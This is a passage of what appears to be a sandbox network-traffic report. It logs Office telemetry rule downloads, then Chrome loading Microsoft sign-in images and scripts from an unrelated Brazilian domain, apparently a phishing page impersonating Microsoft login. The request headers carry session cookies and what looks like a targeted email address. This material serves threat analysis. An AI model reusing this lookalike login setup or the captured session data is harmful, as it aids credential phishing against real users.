                                                  x-ms-request-id: 512a133a-001e-0066-4733-40561e000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171006Z-174f78459685726chC1EWRsnbg0000000xbg000000003hqc
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  100192.168.2.64981713.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:08 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 419
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6CF78C8"
                                                  x-ms-request-id: 5dad9a26-101e-0079-2c66-405913000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171008Z-174f78459685726chC1EWRsnbg0000000x6000000000qqkd
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:08 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  101192.168.2.64981913.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:08 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 405
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                  ETag: "0x8DC582B942B6AFF"
                                                  x-ms-request-id: 1fa1d210-401e-0067-3791-3f09c2000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171008Z-174f7845968cpnpfhC1EWR3afc0000000wz00000000005zv
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:08 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  102192.168.2.64981813.107.246.63443
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-11-27 17:10:08 UTC470INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 472
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                  ETag: "0x8DC582B984BF177"
                                                  x-ms-request-id: a1da7612-c01e-0014-5d80-3fa6a3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241127T171008Z-174f78459688l8rvhC1EWRtzr000000009wg000000004u27
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  103192.168.2.64982394.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC1766OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:08 UTC738INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: image/x-icon
                                                  Content-Length: 17174
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                  ETag: 0x8D8731230C851A6
                                                  x-ms-request-id: 46979c23-001e-005c-5e33-40e1b1000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171008Z-1544c49f7f8lbbnshC1ZRHdt5c00000002t00000000069st
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:08 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                  Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                  2024-11-27 17:10:08 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                  Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  104192.168.2.64982494.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC1780OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://documerger.afua.com.br/?auth=2&qrc=u9s7oo%40vlxwrxa.org&sso_reload=true
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:09 UTC785INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: image/svg+xml
                                                  Content-Length: 621
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Tue, 10 Nov 2020 03:41:24 GMT
                                                  ETag: 0x8D8852A7FA6B761
                                                  x-ms-request-id: ee533db1-401e-004d-07ef-407b05000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171008Z-1544c49f7f8kpl49hC1ZRH1zw0000000033000000000455u
                                                  x-fd-int-roxy-purgeid: 4554691
                                                  X-Cache: TCP_MISS
                                                  Accept-Ranges: bytes
                                                  2024-11-27 17:10:09 UTC621INData Raw: 1f 8b 08 00 00 00 00 00 04 00 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b 4c 68 af a1 b8
                                                  Data Ascii: }UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;Lh


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  105192.168.2.64982294.247.42.1124435640C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-11-27 17:10:08 UTC1454OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/oneDs_641b1cf809bdc17b42ab.js HTTP/1.1
                                                  Host: documerger.afua.com.br
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: qPdM=kuJFyCv2yktT; qPdM.sig=yHkr3qW3q_Sc0dYIPqn3uwlgPt0; esctx-IsLgZTA3fg=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeeE-ciLc2YtQEush5mg9Hg8DjK5WyijU-usIRQ53U5tnjzhEfOTvx-Ju7YbZPmxBxgZM-zZ1XHu7YvG6a8WTfMTZCH4vInA9vwR78KKkNz9EBf5tpBiWZi48_UgUa8gg3OsTOTUxpRq001MDourYOGyAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AUEBqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABBAQ.AQABGgEAAADW6jl31mB3T7ugrWTT8pFeMDNGfnl6oXh6m1eqsE64gD13UKVTkOa0T3VRA3VOaCpKxFRCxPww9QCIPrWTYVEG9X9txaUDGZELufmBiGepVCuL0SOKd58RpLy_rvZgwl0gAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFesF8UsCxSxDcoxw-xrCQ67rIKyVoTpTC9uNH1PXX6p3vQkvFuXnbHNs1WK4tLlVzpWNTTbcy9Ob9ZSIKdy4Vyy6v87hWVWZYDbULvnrAhdXEyhHnDZvmXl3Mnl-gt96cbfaXcDYxLR8O_SeffgzfEpiJGsFRueZIEAZ9CXp4SEcEgAA; esctx-vx9c64vM4xk=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeAwFuG362UjUTo8-5QYKBMiP8QfRQW20XO8feZzPFcg5-Pnb8vUmJJo4As76UyLnLh97_DctiY0iR6ZOaJrr6aX2kkC74smgbaW_v7OGRG0ifKfAFd5gQrv6u0Cz76bVNf4ueMSNsqQJY5hpqqnhLaiAA; fpc=AnIF4PXDa21Bo9TCi_D-hPu4vjNwAQAAA [TRUNCATED]
                                                  2024-11-27 17:10:09 UTC1406INHTTP/1.1 200 OK
                                                  Date: Wed, 27 Nov 2024 17:10:08 GMT
                                                  Content-Type: application/x-javascript
                                                  content-length: 190151
                                                  Connection: close
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Encoding: gzip
                                                  Last-Modified: Thu, 27 Oct 2022 14:24:13 GMT
                                                  ETag: 0x8DAB826EBE74413
                                                  x-ms-request-id: e1ed38c5-401e-001b-5fef-40c2f8000000
                                                  x-ms-version: 2009-09-19
                                                  x-ms-lease-status: unlocked
                                                  x-ms-blob-type: BlockBlob
                                                  Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                  Access-Control-Allow-Origin: *
                                                  x-azure-ref: 20241127T171008Z-1544c49f7f8pj9bchC1ZRHup5s0000000310000000000bkd
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                  2024-11-27 17:10:09 UTC14978INData Raw: 1f 8b 08 00 00 00 00 00 00 03 cc bd 69 77 db 46 b2 30 fc fd fe 0a 0a 27 57 03 8c da 34 29 2f 71 48 23 bc b2 44 db 4c b4 45 4b 9c 8c ac d1 81 c8 96 04 9b 04 18 00 94 ac 91 f8 df 9f aa ea 1d 04 28 29 c9 7d ef 7b 12 8b 40 a3 7a af ae ae ae ae c5 bf 89 93 51 7a d3 2c f8 98 4f 78 91 dd 9e dd f0 f3 69 34 fc fa 53 9e 26 d3 70 e9 d7 fb fb 93 d3 a0 39 9d e5 57 fe c9 c9 fa 29 3b 61 8c 5d cc 92 61 11 a7 89 cf 59 c1 92 e0 ce 9b e5 bc 91 17 59 3c 2c bc 6e d2 cc fc 22 60 49 73 e4 17 cc fb 35 1a cf f8 cf 50 81 c7 7c 9d 2d b8 cb 78 31 cb 92 46 d6 e4 f3 40 c3 f6 af 79 52 6c 47 05 4f 86 b7 35 e0 51 19 7c 9f 67 79 9c 63 16 5e 93 e5 dc ca 72 94 45 43 be cd af f9 b8 06 78 64 01 6f 4c a7 83 24 8f 2f af 8a 7c 33 cd aa 8b 8f 9d 16 bd 8b 72 5e 0b 6a 17 7d d6 ff 06 4d 1e f1 d1 20
                                                  Data Ascii: iwF0'W4)/qH#DLEK()}{@zQz,Oxi4S&p9W);a]aYY<,n"`Is5P|-x1F@yRlGO5Q|gyc^rECxdoL$/|3r^j}M
                                                  2024-11-27 17:10:09 UTC1406INData Raw: 2c 78 b8 67 e4 57 f2 01 8c b1 b2 fd 6f 22 8f de 45 b0 de 85 0d 08 ce 9e 0b aa 1f 8b 11 3c 08 9b 78 48 97 78 46 a5 24 ab d9 bc 5e b4 ed cd 0b ab ad e8 df 24 ba fd 5b b7 2f b7 77 88 4f c2 67 46 4d 1f 0b 75 02 77 fb 58 84 c3 d5 d5 a1 d5 c7 aa bc 89 52 ee 73 55 63 12 54 51 9e 19 a5 98 4c 6c 9b aa 29 7f 81 0e 15 8b c8 b4 6e 6d b8 35 23 fc 77 92 1f 7d c2 7d 60 e9 5a 4e 05 80 55 57 16 ca 64 24 83 8f 7e c9 a2 18 6f be 60 b5 e3 f7 6b ee db cb 3a 66 b6 43 02 28 82 2d f7 ac 41 3e 33 02 d7 52 93 5d 5b 34 e4 fa 89 04 cc b0 a4 8b 56 fe 62 07 43 75 54 db 27 52 61 9c c6 98 e4 50 a6 06 44 5d 6a 06 b3 6a 82 95 ba 93 06 36 1c 95 4e f9 bb 66 f8 2c 4d 84 8f 0d 47 8a 26 24 6d ba 5f e8 23 82 5e ae 0b 25 99 5f 59 dc 77 52 b5 ef 64 61 dc 24 de 4f 1c 01 23 91 79 96 8d 51 e7 a8 6c
                                                  Data Ascii: ,xgWo"E<xHxF$^$[/wOgFMuwXRsUcTQLl)nm5#w}}`ZNUWd$~o`k:fC(-A>3R][4VbCuT'RaPD]jj6Nf,MG&$m_#^%_YwRda$O#yQl
